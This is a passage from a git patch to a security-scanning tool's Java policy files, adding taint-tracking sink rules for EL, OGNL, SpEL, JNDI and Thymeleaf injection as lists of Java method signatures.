"\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_name": "\u90ae\u7bb1\u6cc4\u9732", - "vul_name_en": null, - "vul_name_zh": "\u90ae\u7bb1\u6cc4\u9732", - "vul_type": "\u90ae\u7bb1\u6cc4\u9732" } ] \ No newline at end of file From 1e301013fe101cf181164d2df04a03c97af23253 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 15 Sep 2023 17:01:43 +0800 Subject: [PATCH 112/114] feat: update new strategy. --- static/data/java_full_policy.json | 1008 ++++++++++++++++++++++++----- static/data/java_policy.json | 522 +++++++++++++++ static/data/vul_strategy.json | 8 +- 3 files changed, 1386 insertions(+), 152 deletions(-) diff --git a/static/data/java_full_policy.json b/static/data/java_full_policy.json index 71c260f48..f866c9227 100644 --- a/static/data/java_full_policy.json +++ b/static/data/java_full_policy.json @@ -182,6 +182,265 @@ "type": 1, "value": "Cookie" }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "jakarta.el.ELProcessor.eval(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "jakarta.el.ELProcessor.getValue(java.lang.String,java.lang.Class)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "jakarta.el.ELProcessor.setValue(java.lang.String,java.lang.Object)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "jakarta.el.ELProcessor.setVariable(java.lang.String,java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "jakarta.el.ExpressionFactory.createMethodExpression(jakarta.el.ELContext,java.lang.String,java.lang.Class,java.lang.Class[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "jakarta.el.ExpressionFactory.createValueExpression(jakarta.el.ELContext,java.lang.String,java.lang.Class)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "jakarta.servlet.jsp.el.ExpressionEvaluator.evaluate(java.lang.String,java.lang.Class,jakarta.servlet.jsp.el.VariableResolver,jakarta.servlet.jsp.el.FunctionMapper)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "javax.el.ELProcessor.eval(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "javax.el.ELProcessor.getValue(java.lang.String,java.lang.Class)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "javax.el.ELProcessor.setValue(java.lang.String,java.lang.Object)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "javax.el.ELProcessor.setVariable(java.lang.String,java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "javax.el.ExpressionFactory.createMethodExpression(javax.el.ELContext,java.lang.String,java.lang.Class,java.lang.Class[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "javax.el.ExpressionFactory.createValueExpression(javax.el.ELContext,java.lang.String,java.lang.Class)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "javax.servlet.jsp.el.ExpressionEvaluator.evaluate(java.lang.String,java.lang.Class,javax.servlet.jsp.el.VariableResolver,javax.servlet.jsp.el.FunctionMapper)" + } + ], + "enable": 1, + "type": 4, + "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, { "details": [ { @@ -334,15 +593,491 @@ "stack_blacklist": [], "system_type": 1, "tags": [ - "html-encoded" + "html-encoded" + ], + "target": "P2", + "track": "false", + "type": 1, + "untags": [ + "html-decoded" + ], + "value": "org.unbescape.html.HtmlEscapeUtil.unescape(java.io.Reader,java.io.Writer)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", + "type": 1, + "untags": [ + "html-decoded" + ], + "value": "org.unbescape.html.HtmlEscapeUtil.unescape(java.lang.String)" + } + ], + "enable": 1, + "type": 1, + "value": "Html5EscapeSymbolsInitializer" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": true, + "inherit": "false", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.mysql.jdbc.ResultSetImpl.next()" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": true, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "org.jruby.runtime.load.LibrarySearcher.isAbsolute(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": true, + "inherit": "false", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "org.thymeleaf.spring5.view.ThymeleafView.render(java.util.Map,javax.servlet.http.HttpServletRequest,javax.servlet.http.HttpServletResponse)" + } + ], + "enable": 1, + "type": 1, + "value": "InvalidPropagator" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "jakarta.naming.Context.lookup(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "javax.naming.Context.lookup(java.lang.String)" + } + ], + "enable": 1, + "type": 4, + "value": "JNDI\u6ce8\u5165" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "org.apache.kafka.clients.consumer.ConsumerRecord.value()" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P4,5", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "org.apache.kafka.clients.producer.ProducerRecord.(java.lang.String,java.lang.Integer,java.lang.Long,java.lang.Object,java.lang.Object,java.lang.Iterable)" + } + ], + "enable": 1, + "type": 1, + "value": "Kafka\u4f20\u64ad" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1,2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "com.baomidou.mybatisplus.core.override.MybatisMapperMethod.execute(org.apache.ibatis.session.SqlSession,java.lang.Object[])" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "R", + "track": "false", + "type": 1, + "untags": [], + "value": "org.apache.ibatis.executor.resultset.DefaultResultSetHandler.handleResultSets(java.sql.Statement)" + } + ], + "enable": 1, + "type": 1, + "value": "Mybatis\u4f20\u64ad" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "ognl.Ognl.getValue(java.lang.Object,java.lang.Object)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "ognl.Ognl.getValue(java.lang.Object,java.lang.Object,java.lang.Class)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "ognl.Ognl.getValue(java.lang.Object,java.util.Map,java.lang.Object)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "ognl.Ognl.getValue(java.lang.Object,java.util.Map,java.lang.Object,java.lang.Class)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "ognl.Ognl.getValue(java.lang.String,java.lang.Object)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "ognl.Ognl.getValue(java.lang.String,java.lang.Object,java.lang.Class)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "ognl.Ognl.getValue(java.lang.String,java.util.Map,java.lang.Object)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "ognl.Ognl.getValue(java.lang.String,java.util.Map,java.lang.Object,java.lang.Class)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "ognl.Ognl.parseExpression(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "org.apache.commons.ognl.Ognl.parseExpression(java.lang.String)" + } + ], + "enable": 1, + "type": 4, + "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "java.sql.Statement.setString(int,java.lang.String)" + } + ], + "enable": 1, + "type": 1, + "value": "PreparedStatement" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "O", + "track": "false", + "type": 1, + "untags": [], + "value": "com.caucho.hessian.io.HessianInput.init(java.io.InputStream)" + } + ], + "enable": 1, + "type": 1, + "value": "Propagator:Hessian" + }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "O", + "stack_blacklist": [], + "system_type": 1, + "tags": [ + "cross-site" ], - "target": "P2", - "track": "false", + "target": "R", + "track": "", "type": 1, - "untags": [ - "html-decoded" - ], - "value": "org.unbescape.html.HtmlEscapeUtil.unescape(java.io.Reader,java.io.Writer)" + "untags": [], + "value": "javax.servlet.ServletRequest.getParameterNames()" }, { "command": "", @@ -350,26 +1085,24 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [ - "html-encoded" + "cross-site" ], "target": "R", - "track": "false", + "track": "", "type": 1, - "untags": [ - "html-decoded" - ], - "value": "org.unbescape.html.HtmlEscapeUtil.unescape(java.lang.String)" + "untags": [], + "value": "javax.servlet.ServletRequest.getParameterValues(java.lang.String)" } ], "enable": 1, "type": 1, - "value": "Html5EscapeSymbolsInitializer" + "value": "RequestFacade" }, { "details": [ @@ -378,62 +1111,37 @@ "created_by": 1, "enable": 1, "ignore_blacklist": false, - "ignore_internal": true, - "inherit": "false", + "ignore_internal": false, + "inherit": "true", "language": 1, "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "R", - "track": "false", - "type": 1, - "untags": [], - "value": "com.mysql.jdbc.ResultSetImpl.next()" - }, - { - "command": "", - "created_by": 1, - "enable": 1, - "ignore_blacklist": false, - "ignore_internal": true, - "inherit": "false", - "language": 1, - "source": "P1", - "stack_blacklist": [], - "system_type": 1, - "tags": [], - "target": "R", - "track": "false", - "type": 1, + "target": "", + "track": "true", + "type": 4, "untags": [], - "value": "org.jruby.runtime.load.LibrarySearcher.isAbsolute(java.lang.String)" + "value": "org.springframework.expression.Expression.getValue()" }, { "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, - "ignore_internal": true, - "inherit": "false", + "ignore_internal": false, + "inherit": "true", "language": 1, "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", - "track": "false", - "type": 1, + "target": "", + "track": "true", + "type": 4, "untags": [], - "value": "org.thymeleaf.spring5.view.ThymeleafView.render(java.util.Map,javax.servlet.http.HttpServletRequest,javax.servlet.http.HttpServletResponse)" - } - ], - "enable": 1, - "type": 1, - "value": "InvalidPropagator" - }, - { - "details": [ + "value": "org.springframework.expression.Expression.getValue(java.lang.Class)" + }, { "command": "", "created_by": 1, @@ -442,7 +1150,7 @@ "ignore_internal": false, "inherit": "true", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -450,7 +1158,7 @@ "track": "true", "type": 4, "untags": [], - "value": "jakarta.naming.Context.lookup(java.lang.String)" + "value": "org.springframework.expression.Expression.getValue(java.lang.Object)" }, { "command": "", @@ -460,7 +1168,7 @@ "ignore_internal": false, "inherit": "true", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], @@ -468,32 +1176,25 @@ "track": "true", "type": 4, "untags": [], - "value": "javax.naming.Context.lookup(java.lang.String)" - } - ], - "enable": 1, - "type": 4, - "value": "JNDI\u6ce8\u5165" - }, - { - "details": [ + "value": "org.springframework.expression.Expression.getValue(java.lang.Object,java.lang.Class)" + }, { "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "language": 1, "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "R", - "track": "false", - "type": 1, + "target": "", + "track": "true", + "type": 4, "untags": [], - "value": "org.apache.kafka.clients.consumer.ConsumerRecord.value()" + "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext)" }, { "command": "", @@ -501,42 +1202,35 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "language": 1, - "source": "P4,5", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", - "track": "false", - "type": 1, + "target": "", + "track": "true", + "type": 4, "untags": [], - "value": "org.apache.kafka.clients.producer.ProducerRecord.(java.lang.String,java.lang.Integer,java.lang.Long,java.lang.Object,java.lang.Object,java.lang.Iterable)" - } - ], - "enable": 1, - "type": 1, - "value": "Kafka\u4f20\u64ad" - }, - { - "details": [ + "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Class)" + }, { "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "language": 1, - "source": "P1,2", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "R", - "track": "false", - "type": 1, + "target": "", + "track": "true", + "type": 4, "untags": [], - "value": "com.baomidou.mybatisplus.core.override.MybatisMapperMethod.execute(org.apache.ibatis.session.SqlSession,java.lang.Object[])" + "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Object)" }, { "command": "", @@ -544,25 +1238,18 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "R", - "track": "false", - "type": 1, + "target": "", + "track": "true", + "type": 4, "untags": [], - "value": "org.apache.ibatis.executor.resultset.DefaultResultSetHandler.handleResultSets(java.sql.Statement)" - } - ], - "enable": 1, - "type": 1, - "value": "Mybatis\u4f20\u64ad" - }, - { - "details": [ + "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Object,java.lang.Class)" + }, { "command": "", "created_by": 1, @@ -571,48 +1258,34 @@ "ignore_internal": false, "inherit": "true", "language": 1, - "source": "P2", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", - "track": "false", - "type": 1, + "target": "", + "track": "true", + "type": 4, "untags": [], - "value": "java.sql.Statement.setString(int,java.lang.String)" - } - ], - "enable": 1, - "type": 1, - "value": "PreparedStatement" - }, - { - "details": [ + "value": "org.springframework.expression.Expression.getValueTypeDescriptor()" + }, { "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "language": 1, - "source": "P1", + "source": "O", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "O", - "track": "false", - "type": 1, + "target": "", + "track": "true", + "type": 4, "untags": [], - "value": "com.caucho.hessian.io.HessianInput.init(java.io.InputStream)" - } - ], - "enable": 1, - "type": 1, - "value": "Propagator:Hessian" - }, - { - "details": [ + "value": "org.springframework.expression.Expression.getValueTypeDescriptor(java.lang.Object)" + }, { "command": "", "created_by": 1, @@ -624,14 +1297,12 @@ "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [ - "cross-site" - ], - "target": "R", - "track": "", - "type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, "untags": [], - "value": "javax.servlet.ServletRequest.getParameterNames()" + "value": "org.springframework.expression.Expression.getValueTypeDescriptor(org.springframework.expression.EvaluationContext)" }, { "command": "", @@ -644,19 +1315,17 @@ "source": "O", "stack_blacklist": [], "system_type": 1, - "tags": [ - "cross-site" - ], - "target": "R", - "track": "", - "type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, "untags": [], - "value": "javax.servlet.ServletRequest.getParameterValues(java.lang.String)" + "value": "org.springframework.expression.Expression.getValueTypeDescriptor(org.springframework.expression.EvaluationContext,java.lang.Object)" } ], "enable": 1, - "type": 1, - "value": "RequestFacade" + "type": 4, + "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "details": [ @@ -3455,6 +4124,49 @@ "type": 2, "value": "Struts2" }, + { + "details": [ + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "language": 1, + "source": "P1", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "org.thymeleaf.standard.expression.Expression.parse(java.lang.String)" + }, + { + "command": "", + "created_by": 1, + "enable": 1, + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "language": 1, + "source": "P2", + "stack_blacklist": [], + "system_type": 1, + "tags": [], + "target": "", + "track": "true", + "type": 4, + "untags": [], + "value": "org.thymeleaf.standard.expression.IStandardExpressionParser.parseExpression(org.thymeleaf.context.IExpressionContext,java.lang.String)" + } + ], + "enable": 1, + "type": 4, + "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" + }, { "details": [ { diff --git a/static/data/java_policy.json b/static/data/java_policy.json index 767e0ed59..67ed1a13b 100644 --- a/static/data/java_policy.json +++ b/static/data/java_policy.json @@ -137,6 +137,195 @@ "type": 1, "value": "Cookie" }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.el.ELProcessor.eval(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.el.ELProcessor.getValue(java.lang.String,java.lang.Class)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.el.ELProcessor.setValue(java.lang.String,java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.el.ELProcessor.setVariable(java.lang.String,java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.el.ExpressionFactory.createMethodExpression(jakarta.el.ELContext,java.lang.String,java.lang.Class,java.lang.Class[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.el.ExpressionFactory.createValueExpression(jakarta.el.ELContext,java.lang.String,java.lang.Class)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.servlet.jsp.el.ExpressionEvaluator.evaluate(java.lang.String,java.lang.Class,jakarta.servlet.jsp.el.VariableResolver,jakarta.servlet.jsp.el.FunctionMapper)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.el.ELProcessor.eval(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.el.ELProcessor.getValue(java.lang.String,java.lang.Class)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.el.ELProcessor.setValue(java.lang.String,java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.el.ELProcessor.setVariable(java.lang.String,java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.el.ExpressionFactory.createMethodExpression(javax.el.ELContext,java.lang.String,java.lang.Class,java.lang.Class[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.el.ExpressionFactory.createValueExpression(javax.el.ELContext,java.lang.String,java.lang.Class)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.servlet.jsp.el.ExpressionEvaluator.evaluate(java.lang.String,java.lang.Class,javax.servlet.jsp.el.VariableResolver,javax.servlet.jsp.el.FunctionMapper)" + } + ], + "enable": 1, + "type": 4, + "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, { "details": [ { @@ -431,6 +620,143 @@ "type": 1, "value": "Mybatis\u4f20\u64ad" }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "ognl.Ognl.getValue(java.lang.Object,java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "ognl.Ognl.getValue(java.lang.Object,java.lang.Object,java.lang.Class)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "ognl.Ognl.getValue(java.lang.Object,java.util.Map,java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "ognl.Ognl.getValue(java.lang.Object,java.util.Map,java.lang.Object,java.lang.Class)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": 